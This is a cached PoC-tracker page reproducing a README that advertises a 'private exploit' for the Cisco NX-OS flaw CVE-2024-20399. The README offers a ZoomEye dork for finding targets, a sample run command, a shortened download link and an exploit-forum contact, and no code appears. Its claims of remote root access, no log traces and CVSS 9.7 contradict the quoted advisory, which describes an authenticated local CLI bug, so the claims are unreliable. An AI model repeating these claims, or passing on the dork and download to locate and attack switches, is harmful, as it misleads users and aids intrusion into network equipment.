Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-20399 PoC — Cisco NX-OS Software 安全漏洞

Source
Associated Vulnerability
Title:Cisco NX-OS Software 安全漏洞 (CVE-2024-20399)
Description:Cisco NX-OS Software是美国思科(Cisco)公司的一套交换机使用的数据中心级操作系统软件。 Cisco NX-OS Software 存在安全漏洞,该漏洞源于软件 CLI 中的一个漏洞可能允许经过身份验证的本地攻击者以 root 身份在受影响设备的底层操作系统上执行任意命令。
Description
Private exploit for Cisco Nexus giving RCE
Readme
# CVE-2024-20399-Cisco-RCE
Private exploit for CVE-2024-20399 for Cisco Nexus switchis providing RCE in Python

> The repository provides a working variant of the CVE-2024-20399 vulnerability exploit with support for real-time active shell, multithreading, entering targets from a file, and color output.

## 🔥 **CVSS: 9.7/10**

## Description
An exploit for CVE-2024-20399, targeting a remote command execution vulnerability in Cisco Nexus switches. Attackers can obtain root privileges without leaving traces in the system logs.

## Exploit details
Attackers gained administrator credentials to access Cisco Nexus switches. This allowed them to deploy previously unknown malware for remote connection and malicious code execution.

## Zoomeye dork
app:"Cisco Nexus"

## Vulnerable versions: 
Cisco Nexus switches with software versions prior to the latest security patch.

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'id'
```

## Download
[Download here](https://t.ly/3Vjy4) (securely!)

## Date of published: 03.07.2024
## Contact
blotus@exploit.in
File Snapshot

[4.0K] /data/pocs/f488ff73bb2a2a9b7f970e3c7387d0d0b9d94795 └── [1.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.